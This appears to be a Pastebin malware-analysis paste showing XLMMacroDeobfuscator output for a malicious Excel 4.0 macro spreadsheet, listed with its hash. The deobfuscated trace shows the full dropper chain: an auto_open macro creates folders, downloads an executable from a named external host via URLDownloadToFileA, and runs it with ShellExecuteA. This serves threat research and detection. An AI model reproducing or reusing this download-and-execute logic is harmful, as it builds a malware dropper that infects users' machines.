API tools faq
paste
Advertisement
dissectmalware

Mal XLM Macro

dissectmalware
Jan 22nd, 2021
659
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.80 KB | None | 0 0
raw download clone embed print report
  1. c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
  2.  
  3. https://twitter.com/ffforward/status/1352529115451187200
  4. _ _______
  5. |\ /|( \ ( )
  6. ( \ / )| ( | () () |
  7. \ (_) / | | | || || |
  8. ) _ ( | | | |(_)| |
  9. / ( ) \ | | | | | |
  10. ( / \ )| (____/\| ) ( |
  11. |/ \|(_______/|/ \|
  12. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  13. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  14. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  15. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  16. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  17. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  18. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  19. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  20.  
  21.  
  22. XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  23.  
  24. File: C:\Users\user\Downloads\c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71.xls
  25.  
  26. Encrypted xls file
  27. [Loading Cells]
  28. WARNING *** file size (84997) not 512 + multiple of sector size (512)
  29. auto_open: auto_open->'LHu'!$HA$373
  30. [Starting Deobfuscation]
  31. CELL:HA373 , FullEvaluation , $GX$2555()
  32. CELL:GX2555 , FullEvaluation , SET.NAME(cvolheciepsi,https://iffusedtrac.xyz/3/bbc.exe)
  33. CELL:GX2556 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$BB$54)
  34. CELL:GX2557 , FullEvaluation , $DV$525()
  35. CELL:DV525 , FullEvaluation , FORMULA("https://iffusedtrac.xyz/3/bbc.exe",$BB$54)
  36. CELL:GX2558 , FullEvaluation , GOTO($FO$1446)
  37. CELL:FO1446 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf\GZTJoxx.exe)
  38. CELL:FO1447 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FQ$833)
  39. CELL:FO1448 , FullEvaluation , $DV$525()
  40. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",$FQ$833)
  41. CELL:FO1449 , FullEvaluation , GOTO($IG$243)
  42. CELL:IG243 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf\GZTJoxx.exe)
  43. CELL:IG244 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AA$1219)
  44. CELL:IG245 , FullEvaluation , $DV$525()
  45. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",$AA$1219)
  46. CELL:IG246 , FullEvaluation , GOTO($CT$2484)
  47. CELL:CT2484 , FullEvaluation , SET.NAME(cvolheciepsi,URLMON)
  48. CELL:CT2485 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$DD$48)
  49. CELL:CT2486 , FullEvaluation , $DV$525()
  50. CELL:DV525 , FullEvaluation , FORMULA("URLMON",$DD$48)
  51. CELL:CT2487 , FullEvaluation , GOTO($GR$866)
  52. CELL:GR866 , FullEvaluation , SET.NAME(cvolheciepsi,URLDownloadToFileA)
  53. CELL:GR867 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AO$1808)
  54. CELL:GR868 , FullEvaluation , $DV$525()
  55. CELL:DV525 , FullEvaluation , FORMULA("URLDownloadToFileA",$AO$1808)
  56. CELL:GR869 , FullEvaluation , GOTO($Q$755)
  57. CELL:Q755 , FullEvaluation , SET.NAME(cvolheciepsi,JJCCJJ)
  58. CELL:Q756 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$BE$2748)
  59. CELL:Q757 , FullEvaluation , $DV$525()
  60. CELL:DV525 , FullEvaluation , FORMULA("JJCCJJ",$BE$2748)
  61. CELL:Q758 , FullEvaluation , GOTO($HO$638)
  62. CELL:HO638 , FullEvaluation , SET.NAME(cvolheciepsi,Shell32)
  63. CELL:HO639 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FZ$1722)
  64. CELL:HO640 , FullEvaluation , $DV$525()
  65. CELL:DV525 , FullEvaluation , FORMULA("Shell32",$FZ$1722)
  66. CELL:HO641 , FullEvaluation , GOTO($HR$1806)
  67. CELL:HR1806 , FullEvaluation , SET.NAME(cvolheciepsi,ShellExecuteA)
  68. CELL:HR1807 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AA$2609)
  69. CELL:HR1808 , FullEvaluation , $DV$525()
  70. CELL:DV525 , FullEvaluation , FORMULA("ShellExecuteA",$AA$2609)
  71. CELL:HR1809 , FullEvaluation , GOTO($AJ$685)
  72. CELL:AJ685 , FullEvaluation , SET.NAME(cvolheciepsi,JJCCCCJ)
  73. CELL:AJ686 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EH$734)
  74. CELL:AJ687 , FullEvaluation , $DV$525()
  75. CELL:DV525 , FullEvaluation , FORMULA("JJCCCCJ",$EH$734)
  76. CELL:AJ688 , FullEvaluation , GOTO($GE$1496)
  77. CELL:GE1496 , FullEvaluation , SET.NAME(cvolheciepsi,Open)
  78. CELL:GE1497 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FA$484)
  79. CELL:GE1498 , FullEvaluation , $DV$525()
  80. CELL:DV525 , FullEvaluation , FORMULA("Open",$FA$484)
  81. CELL:GE1499 , FullEvaluation , GOTO($AY$1410)
  82. CELL:AY1410 , FullEvaluation , SET.NAME(cvolheciepsi,regsvr32.exe)
  83. CELL:AY1411 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$HL$2686)
  84. CELL:AY1412 , FullEvaluation , $DV$525()
  85. CELL:DV525 , FullEvaluation , FORMULA("regsvr32.exe",$HL$2686)
  86. CELL:AY1413 , FullEvaluation , GOTO($GE$2891)
  87. CELL:GE2891 , FullEvaluation , SET.NAME(cvolheciepsi,rundll32.exe)
  88. CELL:GE2892 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$ER$2096)
  89. CELL:GE2893 , FullEvaluation , $DV$525()
  90. CELL:DV525 , FullEvaluation , FORMULA("rundll32.exe",$ER$2096)
  91. CELL:GE2894 , FullEvaluation , GOTO($AG$2509)
  92. CELL:AG2509 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe)
  93. CELL:AG2510 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$G$2318)
  94. CELL:AG2511 , FullEvaluation , $DV$525()
  95. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe",$G$2318)
  96. CELL:AG2512 , FullEvaluation , GOTO($DB$2562)
  97. CELL:DB2562 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf)
  98. CELL:DB2563 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$U$370)
  99. CELL:DB2564 , FullEvaluation , $DV$525()
  100. CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf",$U$370)
  101. CELL:DB2565 , FullEvaluation , GOTO($GW$123)
  102. CELL:GW123 , FullEvaluation , SET.NAME(cvolheciepsi,Kernel32)
  103. CELL:GW124 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EH$2782)
  104. CELL:GW125 , FullEvaluation , $DV$525()
  105. CELL:DV525 , FullEvaluation , FORMULA("Kernel32",$EH$2782)
  106. CELL:GW126 , FullEvaluation , GOTO($HF$2396)
  107. CELL:HF2396 , FullEvaluation , SET.NAME(cvolheciepsi,CreateDirectoryA)
  108. CELL:HF2397 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$W$2047)
  109. CELL:HF2398 , FullEvaluation , $DV$525()
  110. CELL:DV525 , FullEvaluation , FORMULA("CreateDirectoryA",$W$2047)
  111. CELL:HF2399 , FullEvaluation , GOTO($EJ$1217)
  112. CELL:EJ1217 , FullEvaluation , SET.NAME(cvolheciepsi,JCJ)
  113. CELL:EJ1218 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EA$1633)
  114. CELL:EJ1219 , FullEvaluation , $DV$525()
  115. CELL:DV525 , FullEvaluation , FORMULA("JCJ",$EA$1633)
  116. CELL:EJ1220 , FullEvaluation , GOTO($FY$2397)
  117. CELL:FY2397 , FullEvaluation , SET.NAME(cvolheciepsi,INSENG)
  118. CELL:FY2398 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$H$206)
  119. CELL:FY2399 , FullEvaluation , $DV$525()
  120. CELL:DV525 , FullEvaluation , FORMULA("INSENG",$H$206)
  121. CELL:FY2400 , FullEvaluation , GOTO($BX$410)
  122. CELL:BX410 , FullEvaluation , SET.NAME(cvolheciepsi,DownloadFile)
  123. CELL:BX411 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FZ$1407)
  124. CELL:BX412 , FullEvaluation , $DV$525()
  125. CELL:DV525 , FullEvaluation , FORMULA("DownloadFile",$FZ$1407)
  126. CELL:BX413 , FullEvaluation , GOTO($CQ$2870)
  127. CELL:CQ2870 , FullEvaluation , SET.NAME(cvolheciepsi,BCCJ)
  128. CELL:CQ2871 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$GO$503)
  129. CELL:CQ2872 , FullEvaluation , $DV$525()
  130. CELL:DV525 , FullEvaluation , FORMULA("BCCJ",$GO$503)
  131. CELL:CQ2873 , FullEvaluation , GOTO($FX$1117)
  132. CELL:FX1117 , FullEvaluation , SET.NAME(cvolheciepsi,GEJunuZl)
  133. CELL:FX1118 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AJ$617)
  134. CELL:FX1119 , FullEvaluation , $DV$525()
  135. CELL:DV525 , FullEvaluation , FORMULA("GEJunuZl",$AJ$617)
  136. CELL:FX1120 , FullEvaluation , GOTO($Y$2822)
  137. CELL:Y2822 , FullEvaluation , SET.NAME(cvolheciepsi,cswzqQfY)
  138. CELL:Y2823 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FW$2046)
  139. CELL:Y2824 , FullEvaluation , $DV$525()
  140. CELL:DV525 , FullEvaluation , FORMULA("cswzqQfY",$FW$2046)
  141. CELL:Y2825 , FullEvaluation , GOTO($FP$1090)
  142. CELL:FP1090 , FullEvaluation , SET.NAME(cvolheciepsi,xgiDfkxI)
  143. CELL:FP1091 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$HH$1839)
  144. CELL:FP1092 , FullEvaluation , $DV$525()
  145. CELL:DV525 , FullEvaluation , FORMULA("xgiDfkxI",$HH$1839)
  146. CELL:FP1093 , FullEvaluation , $HA$374()
  147. CELL:HA374 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\wCmfmRe",0)
  148. CELL:HA375 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\wCmfmRe\dtwzrQf",0)
  149. CELL:HA377 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://iffusedtrac.xyz/3/bbc.exe","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",0,0)
  150. CELL:HA379 , FullEvaluation , IF($HA$378<>0.0)
  151. CELL:HA380 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","https://iffusedtrac.xyz/3/bbc.exe","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",1)
  152. CELL:HA382 , FullEvaluation , END.IF
  153. CELL:HA384 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",,0,0)
  154. CELL:HA387 , End , HALT()
  155.  
  156. Files:
  157.  
  158. [END of Deobfuscation]
  159. time elapsed: 0.6546010971069336
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!